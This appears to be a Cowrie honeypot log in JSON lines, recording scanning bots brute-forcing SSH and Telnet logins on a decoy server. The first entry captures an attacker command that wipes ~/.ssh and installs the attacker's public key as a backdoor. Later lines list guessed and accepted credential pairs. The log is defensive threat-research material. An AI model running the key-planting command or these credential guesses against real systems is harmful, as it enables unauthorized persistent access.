{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T04:14:55.286401Z","src_ip":"211.22.25.164","session":"ef7abf972359"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T04:14:55.527492Z","src_ip":"211.22.25.164","session":"ef7abf972359"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:14:55.528472Z","src_ip":"211.22.25.164","session":"ef7abf972359"}
{"eventid":"cowrie.session.connect","src_ip":"192.210.135.20","src_port":33896,"dst_ip":"1.2.3.4","dst_port":22,"session":"0cc932a74833","protocol":"ssh","message":"New connection: 192.210.135.20:33896 (1.2.3.4:22) [session: 0cc932a74833]","sensor":"my-vps","timestamp":"2025-09-09T04:14:55.661473Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:14:55.662311Z","src_ip":"192.210.135.20","session":"0cc932a74833"}
{"eventid":"cowrie.session.connect","src_ip":"211.22.25.164","src_port":12807,"dst_ip":"1.2.3.4","dst_port":22,"session":"386ce0eadab3","protocol":"ssh","message":"New connection: 211.22.25.164:12807 (1.2.3.4:22) [session: 386ce0eadab3]","sensor":"my-vps","timestamp":"2025-09-09T04:14:55.767013Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:14:55.767965Z","src_ip":"211.22.25.164","session":"386ce0eadab3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:14:55.781357Z","src_ip":"192.210.135.20","session":"0cc932a74833"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:14:56.007817Z","src_ip":"211.22.25.164","session":"386ce0eadab3"}
{"eventid":"cowrie.login.failed","username":"demo","password":"password","message":"login attempt [demo/password] failed","sensor":"my-vps","timestamp":"2025-09-09T04:14:56.298431Z","src_ip":"192.210.135.20","session":"0cc932a74833"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T04:14:57.010440Z","src_ip":"211.22.25.164","session":"386ce0eadab3"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:14:57.419791Z","src_ip":"192.210.135.20","session":"0cc932a74833"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:14:58.252668Z","src_ip":"211.22.25.164","session":"386ce0eadab3"}
{"eventid":"cowrie.session.connect","src_ip":"211.22.25.164","src_port":36550,"dst_ip":"1.2.3.4","dst_port":22,"session":"bb0889434303","protocol":"ssh","message":"New connection: 211.22.25.164:36550 (1.2.3.4:22) [session: bb0889434303]","sensor":"my-vps","timestamp":"2025-09-09T04:14:58.491458Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:14:58.492115Z","src_ip":"211.22.25.164","session":"bb0889434303"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:14:58.732193Z","src_ip":"211.22.25.164","session":"bb0889434303"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:14:59.732654Z","src_ip":"211.22.25.164","session":"bb0889434303"}
{"eventid":"cowrie.session.closed","duration":"7.2","message":"Connection lost after 7.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:14:59.973510Z","src_ip":"211.22.25.164","session":"ef7abf972359"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:14:59.974542Z","src_ip":"211.22.25.164","session":"bb0889434303"}
{"eventid":"cowrie.session.closed","duration":13.792882919311523,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:15:00.104628Z","src_ip":"212.227.125.160","session":"14fbbaa0d327"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46691,"dst_ip":"1.2.3.4","dst_port":23,"session":"840b9770999d","protocol":"telnet","message":"New connection: 212.227.125.160:46691 (1.2.3.4:23) [session: 840b9770999d]","sensor":"my-vps","timestamp":"2025-09-09T04:15:00.304519Z"}
{"eventid":"cowrie.session.closed","duration":13.814191102981567,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:15:01.074470Z","src_ip":"212.227.125.160","session":"7da4352a1723"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46694,"dst_ip":"1.2.3.4","dst_port":23,"session":"d73ffb3feaa9","protocol":"telnet","message":"New connection: 212.227.125.160:46694 (1.2.3.4:23) [session: d73ffb3feaa9]","sensor":"my-vps","timestamp":"2025-09-09T04:15:01.275955Z"}
{"eventid":"cowrie.session.closed","duration":13.97218108177185,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:15:03.353225Z","src_ip":"212.227.125.160","session":"a95979ec8eb7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46705,"dst_ip":"1.2.3.4","dst_port":23,"session":"d83b04c62d8f","protocol":"telnet","message":"New connection: 212.227.125.160:46705 (1.2.3.4:23) [session: d83b04c62d8f]","sensor":"my-vps","timestamp":"2025-09-09T04:15:03.530420Z"}
{"eventid":"cowrie.session.connect","src_ip":"154.209.4.55","src_port":59003,"dst_ip":"1.2.3.4","dst_port":22,"session":"ef00e7c23b51","protocol":"ssh","message":"New connection: 154.209.4.55:59003 (1.2.3.4:22) [session: ef00e7c23b51]","sensor":"my-vps","timestamp":"2025-09-09T04:15:04.707890Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:15:04.714127Z","src_ip":"154.209.4.55","session":"ef00e7c23b51"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:15:04.914999Z","src_ip":"154.209.4.55","session":"ef00e7c23b51"}
{"eventid":"cowrie.login.failed","username":"blank","password":"1234567890","message":"login attempt [blank/1234567890] failed","sensor":"my-vps","timestamp":"2025-09-09T04:15:05.721673Z","src_ip":"154.209.4.55","session":"ef00e7c23b51"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:15:06.940430Z","src_ip":"154.209.4.55","session":"ef00e7c23b51"}
{"eventid":"cowrie.session.closed","duration":14.054080247879028,"message":"Connection lost after 14 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:15:14.358530Z","src_ip":"212.227.125.160","session":"840b9770999d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46905,"dst_ip":"1.2.3.4","dst_port":23,"session":"80c352762ae3","protocol":"telnet","message":"New connection: 212.227.125.160:46905 (1.2.3.4:23) [session: 80c352762ae3]","sensor":"my-vps","timestamp":"2025-09-09T04:15:14.539606Z"}
{"eventid":"cowrie.session.closed","duration":14.0343177318573,"message":"Connection lost after 14 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:15:15.310198Z","src_ip":"212.227.125.160","session":"d73ffb3feaa9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46914,"dst_ip":"1.2.3.4","dst_port":23,"session":"be4c4edb18f3","protocol":"telnet","message":"New connection: 212.227.125.160:46914 (1.2.3.4:23) [session: be4c4edb18f3]","sensor":"my-vps","timestamp":"2025-09-09T04:15:15.485038Z"}
{"eventid":"cowrie.session.closed","duration":13.898885011672974,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:15:17.429201Z","src_ip":"212.227.125.160","session":"d83b04c62d8f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46927,"dst_ip":"1.2.3.4","dst_port":23,"session":"947a2e4e3d1e","protocol":"telnet","message":"New connection: 212.227.125.160:46927 (1.2.3.4:23) [session: 947a2e4e3d1e]","sensor":"my-vps","timestamp":"2025-09-09T04:15:17.649183Z"}
{"eventid":"cowrie.session.closed","duration":13.36013126373291,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:15:27.899667Z","src_ip":"212.227.125.160","session":"80c352762ae3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47105,"dst_ip":"1.2.3.4","dst_port":23,"session":"1b80a168454e","protocol":"telnet","message":"New connection: 212.227.125.160:47105 (1.2.3.4:23) [session: 1b80a168454e]","sensor":"my-vps","timestamp":"2025-09-09T04:15:28.080982Z"}
{"eventid":"cowrie.session.closed","duration":13.934677124023438,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:15:29.419641Z","src_ip":"212.227.125.160","session":"be4c4edb18f3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47139,"dst_ip":"1.2.3.4","dst_port":23,"session":"112caa88efd7","protocol":"telnet","message":"New connection: 212.227.125.160:47139 (1.2.3.4:23) [session: 112caa88efd7]","sensor":"my-vps","timestamp":"2025-09-09T04:15:29.625491Z"}
{"eventid":"cowrie.session.closed","duration":13.195203304290771,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:15:30.844321Z","src_ip":"212.227.125.160","session":"947a2e4e3d1e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47221,"dst_ip":"1.2.3.4","dst_port":23,"session":"3f07de7f45f7","protocol":"telnet","message":"New connection: 212.227.125.160:47221 (1.2.3.4:23) [session: 3f07de7f45f7]","sensor":"my-vps","timestamp":"2025-09-09T04:15:31.061897Z"}
{"eventid":"cowrie.session.connect","src_ip":"152.32.190.168","src_port":57220,"dst_ip":"1.2.3.4","dst_port":22,"session":"00662d42a1bc","protocol":"ssh","message":"New connection: 152.32.190.168:57220 (1.2.3.4:22) [session: 00662d42a1bc]","sensor":"my-vps","timestamp":"2025-09-09T04:15:39.777130Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:15:39.777985Z","src_ip":"152.32.190.168","session":"00662d42a1bc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:15:39.978934Z","src_ip":"152.32.190.168","session":"00662d42a1bc"}
{"eventid":"cowrie.login.failed","username":"home","password":"12345678","message":"login attempt [home/12345678] failed","sensor":"my-vps","timestamp":"2025-09-09T04:15:40.827365Z","src_ip":"152.32.190.168","session":"00662d42a1bc"}
{"eventid":"cowrie.session.closed","duration":13.839253425598145,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:15:41.920166Z","src_ip":"212.227.125.160","session":"1b80a168454e"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:15:42.031980Z","src_ip":"152.32.190.168","session":"00662d42a1bc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47414,"dst_ip":"1.2.3.4","dst_port":23,"session":"cfdcac2adfcf","protocol":"telnet","message":"New connection: 212.227.125.160:47414 (1.2.3.4:23) [session: cfdcac2adfcf]","sensor":"my-vps","timestamp":"2025-09-09T04:15:42.149230Z"}
{"eventid":"cowrie.session.closed","duration":13.45905327796936,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:15:43.084478Z","src_ip":"212.227.125.160","session":"112caa88efd7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47433,"dst_ip":"1.2.3.4","dst_port":23,"session":"6682c51b0145","protocol":"telnet","message":"New connection: 212.227.125.160:47433 (1.2.3.4:23) [session: 6682c51b0145]","sensor":"my-vps","timestamp":"2025-09-09T04:15:43.270925Z"}
{"eventid":"cowrie.session.closed","duration":13.34837031364441,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:15:44.410191Z","src_ip":"212.227.125.160","session":"3f07de7f45f7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48558,"dst_ip":"1.2.3.4","dst_port":23,"session":"59a39e1c03ed","protocol":"telnet","message":"New connection: 212.227.235.229:48558 (1.2.3.4:23) [session: 59a39e1c03ed]","sensor":"my-vps","timestamp":"2025-09-09T04:15:53.376743Z"}
{"eventid":"cowrie.session.connect","src_ip":"103.59.95.12","src_port":47162,"dst_ip":"1.2.3.4","dst_port":22,"session":"2d1aa20236db","protocol":"ssh","message":"New connection: 103.59.95.12:47162 (1.2.3.4:22) [session: 2d1aa20236db]","sensor":"my-vps","timestamp":"2025-09-09T04:15:55.299568Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:15:55.300579Z","src_ip":"103.59.95.12","session":"2d1aa20236db"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:15:55.567290Z","src_ip":"103.59.95.12","session":"2d1aa20236db"}
{"eventid":"cowrie.session.connect","src_ip":"51.81.118.153","src_port":34390,"dst_ip":"1.2.3.4","dst_port":22,"session":"e4d882f15eb6","protocol":"ssh","message":"New connection: 51.81.118.153:34390 (1.2.3.4:22) [session: e4d882f15eb6]","sensor":"my-vps","timestamp":"2025-09-09T04:15:55.574952Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:15:55.575480Z","src_ip":"51.81.118.153","session":"e4d882f15eb6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:15:55.673660Z","src_ip":"51.81.118.153","session":"e4d882f15eb6"}
{"eventid":"cowrie.session.closed","duration":13.921829223632812,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:15:56.070991Z","src_ip":"212.227.125.160","session":"cfdcac2adfcf"}
{"eventid":"cowrie.login.failed","username":"hacker","password":"password","message":"login attempt [hacker/password] failed","sensor":"my-vps","timestamp":"2025-09-09T04:15:56.094038Z","src_ip":"51.81.118.153","session":"e4d882f15eb6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47637,"dst_ip":"1.2.3.4","dst_port":23,"session":"a728c2f3b28b","protocol":"telnet","message":"New connection: 212.227.125.160:47637 (1.2.3.4:23) [session: a728c2f3b28b]","sensor":"my-vps","timestamp":"2025-09-09T04:15:56.245060Z"}
{"eventid":"cowrie.session.closed","duration":13.690886974334717,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:15:56.961736Z","src_ip":"212.227.125.160","session":"6682c51b0145"}
{"eventid":"cowrie.login.success","username":"root","password":"Root@2020","message":"login attempt [root/Root@2020] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:15:56.963032Z","src_ip":"103.59.95.12","session":"2d1aa20236db"}
